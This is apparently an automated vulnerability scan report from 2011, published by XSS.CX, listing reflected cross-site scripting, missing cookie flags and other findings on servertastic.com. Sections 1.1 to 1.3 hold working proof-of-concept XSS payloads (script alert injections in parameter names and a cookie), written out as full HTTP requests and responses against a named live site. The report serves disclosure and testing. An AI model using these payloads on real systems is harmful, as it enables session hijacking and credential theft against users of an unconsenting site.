XSS, servertastic.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Home at Thu Mar 17 06:48:17 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. https://www.servertastic.com/ [name of an arbitrarily supplied request parameter]

1.2. https://www.servertastic.com/contact/ [name of an arbitrarily supplied request parameter]

1.3. https://www.servertastic.com/support/ST.ashx [siteuidut cookie]

2. SSL cookie without secure flag set

2.1. https://www.servertastic.com/contact/

2.2. https://www.servertastic.com/

2.3. https://www.servertastic.com/smartertools/

2.4. https://www.servertastic.com/support/ST.ashx

3. Cookie without HttpOnly flag set

3.1. https://www.servertastic.com/contact/

3.2. https://www.servertastic.com/

3.3. https://www.servertastic.com/smartertools/

3.4. https://www.servertastic.com/support/ST.ashx

4. Cross-domain script include

4.1. https://www.servertastic.com/

4.2. https://www.servertastic.com/contact/

4.3. https://www.servertastic.com/smartertools/

5. Cacheable HTTPS response

5.1. https://www.servertastic.com/

5.2. https://www.servertastic.com/contact/

5.3. https://www.servertastic.com/smartertools/

6. HTML does not specify charset

6.1. https://www.servertastic.com/

6.2. https://www.servertastic.com/contact/

6.3. https://www.servertastic.com/smartertools/



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://www.servertastic.com/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3879e"><script>alert(1)</script>2fe30f9a2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3879e"><script>alert(1)</script>2fe30f9a2d=1 HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 8542
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...
<form id="currmenuform" method="get" action="https://www.servertastic.com/Rejected-By-UrlScan?~/?3879e"><script>alert(1)</script>2fe30f9a2d=1">
...[SNIP]...

1.2. https://www.servertastic.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72164"><script>alert(1)</script>b2a495ea941 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?72164"><script>alert(1)</script>b2a495ea941=1 HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 8551
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=qk87Y5414642; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OFODFPFDIHPIKLOEFJPDLMEK; path=/
Date: Tue, 15 Mar 2011 01:27:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...
<form id="currmenuform" method="get" action="https://www.servertastic.com/Rejected-By-UrlScan?~/contact/?72164"><script>alert(1)</script>b2a495ea941=1">
...[SNIP]...

1.3. https://www.servertastic.com/support/ST.ashx [siteuidut cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /support/ST.ashx

Issue detail

The value of the siteuidut cookie is copied into the HTML document as plain text between tags. The payload d2945<script>alert(1)</script>7279aa18bb9 was submitted in the siteuidut cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /support/ST.ashx?scriptonly=true HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/smartertools/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473d2945<script>alert(1)</script>7279aa18bb9; servertastic=s=mpfrte414626

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Tue, 15 Mar 2011 01:28:14 GMT
Content-Length: 37861

this.STVisitorValue = "8f8d83c8d4cc4de9a64c4ec46aa8d473d2945<script>alert(1)</script>7279aa18bb9";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.STTimeoutID = 0;
this.STPortalURL = "";
this.STImgHeigh
...[SNIP]...

2. SSL cookie without secure flag set  previous  next
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


2.1. https://www.servertastic.com/contact/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.servertastic.com
Path:   /contact/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9406
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=454iYf414628; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OEODFPFDADHFBAHHMGBPHKDH; path=/
Date: Tue, 15 Mar 2011 01:27:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

2.2. https://www.servertastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13073
Content-Type: text/html
Expires: Tue, 15 Mar 2011 01:28:14 GMT
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

2.3. https://www.servertastic.com/smartertools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /smartertools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smartertools/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12096
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=mpfrte414626; path=/
Date: Tue, 15 Mar 2011 01:27:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

2.4. https://www.servertastic.com/support/ST.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /support/ST.ashx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/ST.ashx?scriptonly=true HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: siteuidut=203ce35226604bebbbf7c94235f0df11; expires=Fri, 15-Mar-2041 01:27:26 GMT; path=/
Date: Tue, 15 Mar 2011 01:27:26 GMT
Content-Length: 37820

this.STVisitorValue = "203ce35226604bebbbf7c94235f0df11";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.S
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 4 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. https://www.servertastic.com/contact/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.servertastic.com
Path:   /contact/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9406
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=454iYf414628; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OEODFPFDADHFBAHHMGBPHKDH; path=/
Date: Tue, 15 Mar 2011 01:27:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

3.2. https://www.servertastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13073
Content-Type: text/html
Expires: Tue, 15 Mar 2011 01:28:14 GMT
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

3.3. https://www.servertastic.com/smartertools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /smartertools/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smartertools/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12096
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=mpfrte414626; path=/
Date: Tue, 15 Mar 2011 01:27:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

3.4. https://www.servertastic.com/support/ST.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /support/ST.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/ST.ashx?scriptonly=true HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript
Expires: -1
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: siteuidut=203ce35226604bebbbf7c94235f0df11; expires=Fri, 15-Mar-2041 01:27:26 GMT; path=/
Date: Tue, 15 Mar 2011 01:27:26 GMT
Content-Length: 37820

this.STVisitorValue = "203ce35226604bebbbf7c94235f0df11";
this.STCallbackInterval = 8000;
this.STHandlerFile = "ST.ashx";
this.STLastCallbackImageHeight = 0;
this.STLastCallbackAction = 0;
this.S
...[SNIP]...

4. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. https://www.servertastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13073
Content-Type: text/html
Expires: Tue, 15 Mar 2011 01:28:14 GMT
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...
<td align="right"><script type="text/javascript" src="https://trustseal.verisign.com/getseal?host_name=www.servertastic.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

4.2. https://www.servertastic.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /contact/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
